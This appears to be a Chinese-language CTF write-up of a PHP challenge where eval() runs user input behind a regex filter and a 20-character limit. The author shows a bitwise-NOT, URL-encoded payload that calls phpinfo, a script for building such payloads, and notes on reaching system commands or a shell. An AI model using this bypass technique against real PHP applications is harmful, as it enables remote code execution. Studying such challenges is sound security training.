题目为ctf web中php正则绕过题
前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。
题目如下,解析flag.php中的flag变量
<?php
include("flag.php");
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>20){
die("Too Long.");
}
if(preg_match("/[A-Za-z0-9_]+/",$code)){
die("Not Allowed.");
}
@eval($code);
}else{
highlight_file(__FILE__);
}
解题思路
1.题目不告知flag.php的内容,所以唯一的办法只有打印出flag.php,先想办法绕过
2.因为_也在正则里面,所以 =${_GET}[_]();&_=phpinfo()没办法传入
3.尝试php7 中的($a)();来执行动态函数 例如 ('phpinfo')()
4.那么动态构造函数名称即可,可理解,假如你是:(1+1)(); php会先运算1+1=2 然后在调用:2();
5.借助大牛的payload (~%8F%97%8F%96%91%99%90)();成功执行
image
6.payload构造方式如下
<?php
$a = 'phpinfo';
$b=~$a;
echo ~$a;
echo "------";
echo urlencode($b);
** 如何理解? **
对执行的函数取反然后进行 urlencode 详细可自行科普
7.当前可执行phpinfo,如何获取flag.php的内容?思路继续扩展
- a.使用php中的 system 或者exec 函数进行执行系统命令
- b.弹shell? 绕不过长度限制
- c.使用file()函数读取文件,需要联合var_dump或者print_r,绕不过长度
以上均是长度限制 笔者解题终于此
扩展 已经只flag.php文件的情况下 例如
<?php
function getFlag(){
$flag = "111111111111111111";
echo $flag;
};
?>
那么只需要 执行getFlag()函数即可
('getFlag')();对flag进行编码
以上就是笔者对php绕过的小理解和内容分享
参考文章:http://www.ttk7.cn/post-121.html
欢迎讨论,持续更新中,感谢关注
